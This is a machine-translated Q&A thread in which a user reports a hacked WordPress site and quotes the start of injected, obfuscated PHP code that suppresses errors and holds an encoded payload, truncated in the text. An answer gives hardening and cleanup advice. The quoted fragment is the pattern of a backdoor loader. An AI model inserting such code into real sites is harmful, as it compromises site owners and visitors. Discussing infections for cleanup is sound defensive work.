Wordpress被黑了,并添加了PHP代码

use*_*410 1 security wordpress

我在更新的wordpress网站上获得了此代码.

Wordpress 3.3.1,所有插件都是最新的.
插件列表:自定义联系表单,google-maps-for-wordpress和seo-ultimate.

一些主题文件受CHMOD 644的影响,每次我让CHMOD 777这个文件启动,但它不会影响只有777个文件,它也会影响644个文件.

代码如下:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
Run Code Online (Sandbox Code Playgroud)

那么,我该如何防止这种情况,以及代码的作用是什么?

mar*_*dge 6

没有Wordpress文件应该是777; 最大权限是755个文件夹,644个文件.请参阅强化WordPress«WordPress Codex.

您的托管帐户 - 可能是廉价的共享托管 - 可能是黑客矢量.告诉你的主人; 可能找到一个更安全的主机.更改所有密码.扫描您自己的电脑.

要彻底清理您的WP安装和托管帐户,请参阅常见问题解答:我的网站遭到黑客攻击«WordPress Codex以及如何彻底清理您的黑客wordpress安装以及如何在被黑客攻击的WordPress中找到后门.